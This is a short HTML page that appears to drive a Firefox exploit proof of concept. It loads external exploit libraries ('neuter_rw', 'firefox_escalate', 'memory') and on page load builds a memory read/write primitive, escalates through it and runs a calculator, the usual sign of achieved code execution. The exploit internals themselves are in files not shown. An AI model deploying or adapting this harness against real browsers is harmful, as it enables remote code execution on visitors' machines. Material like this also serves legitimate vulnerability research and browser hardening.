<html>
<head>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<script src="/neuter/neuter_rw.js"></script>
<script src="/libexp/firefox_escalate.js"></script>
<script src="/libexp/memory.js"></script>
<script src="/libexp/platform.js"></script>
<script src="/libexp/utils.js"></script>
<script>

function Main() {
  platform = new Platform();
  Variable.InstallTypes();
  NeuterRW.InstallSlots();
  rw = new NeuterRW();
  escalate = new FirefoxEscalate(rw);
  escalate.ExecuteCalc();
}

</script>
</head>
<body onload="Main()">
<p id="log" style="font-family: Courier">
</p>
</body>
</html>

